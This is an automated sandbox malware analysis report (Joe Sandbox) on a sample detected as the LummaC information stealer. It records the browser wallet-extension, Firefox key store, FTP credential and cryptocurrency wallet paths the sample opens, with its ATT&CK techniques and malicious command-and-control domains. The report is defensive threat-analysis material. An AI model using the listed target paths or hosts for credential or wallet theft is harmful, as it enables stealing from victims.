Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Yara match	File source: 00000003.00000003.2773711720.000000000345D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2773902054.000000000345D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 4512, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 4512, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	311 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	4 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	33 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	251 Security Software Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	23 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	23 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PASS-1234.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\gdi32.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://abruptyopsn.shop:443/apial	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/api9v9-	100%	Avira URL Cloud	malware
https://abruptyopsn.shop:443/apiffxt.default-release/key4.dbPK	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/apii	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/4	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/Ow	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/N	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/apid	100%	Avira URL Cloud	malware
undesirabkel.click	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/api	100%	Avira URL Cloud	malware
https://undesirabkel.click/api	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/Y	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/22h	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/apiNET;	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/g	100%	Avira URL Cloud	malware
http://crl.miH	0%	Avira URL Cloud	safe
https://abruptyopsn.shop/apiB	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/api4	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
undesirabkel.click	188.114.97.3	true	false	high
abruptyopsn.shop	104.21.96.1	true	true	unknown
nearycrepso.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
undesirabkel.click	true	Avira URL Cloud: malware	unknown
rabidcowse.shop	false		high
wholersorie.shop	false		high
https://abruptyopsn.shop/api	true	Avira URL Cloud: malware	unknown
https://undesirabkel.click/api	true	Avira URL Cloud: malware	unknown
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
nearycrepso.shop	false		high
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop:443/apial	aspnet_regiis.exe, 00000003.00000003.2783626201.00000000058C3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop/4	aspnet_regiis.exe, 00000003.00000003.2738030151.00000000034CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	aspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.mozilla.or	aspnet_regiis.exe, 00000003.00000003.2726217533.00000000058EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop:443/apiffxt.default-release/key4.dbPK	aspnet_regiis.exe, 00000003.00000003.2788177021.00000000058C1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2829918442.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3390437810.00000000058C3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783626201.00000000058C3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://abruptyopsn.shop/api9v9-	aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://abruptyopsn.shop/apid	aspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773860884.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2793627901.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2788196527.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783789033.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773630048.0000000003499000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389965700.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773956570.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop/N	aspnet_regiis.exe, 00000003.00000002.3389991161.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop/apii	aspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783789033.00000000034B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://abruptyopsn.shop/Ow	aspnet_regiis.exe, 00000003.00000003.2700805678.000000000345D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop/g	aspnet_regiis.exe, 00000003.00000003.2773956570.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2738030151.00000000034CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop/Y	aspnet_regiis.exe, 00000003.00000003.2725007769.00000000034CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	aspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop/22h	aspnet_regiis.exe, 00000003.00000003.2700805678.0000000003431000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.miH	aspnet_regiis.exe, 00000003.00000003.2700922914.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773860884.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2793627901.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773630048.0000000003499000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2700786138.0000000003499000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://abruptyopsn.shop/apiB	aspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773860884.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2793627901.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2788196527.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783789033.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773630048.0000000003499000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389965700.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773956570.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://abruptyopsn.shop/apiNET;	aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop/api4	aspnet_regiis.exe, 00000003.00000003.2793627901.00000000034CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop/	aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2712906052.00000000058C6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	undesirabkel.click	European Union		13335	CLOUDFLARENETUS	false
104.21.96.1	abruptyopsn.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582873
Start date and time:	2024-12-31 17:38:18 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PASS-1234.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/7@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 35 Number of non-executed functions: 66
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.20, 40.126.32.140, 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: PASS-1234.exe

Simulations

Behavior and APIs

Time	Type	Description
11:39:17	API Interceptor	1x Sleep call for process: WerFault.exe modified
11:39:45	API Interceptor	11x Sleep call for process: aspnet_regiis.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
104.21.96.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	pelisplus.so/administrator/index.php
104.21.96.1	Recibos.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
abruptyopsn.shop	ReploidReplic.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
abruptyopsn.shop	BasesRow.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
undesirabkel.click	Launcher_x64.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	6QLvb9i.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.30.13
	WonderHack.exe	Get hash	malicious	LummaC	Browse	104.21.30.13

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Launcher_x64.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Delta.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.52.90
	setup.msi	Get hash	malicious	Unknown	Browse	188.114.97.3
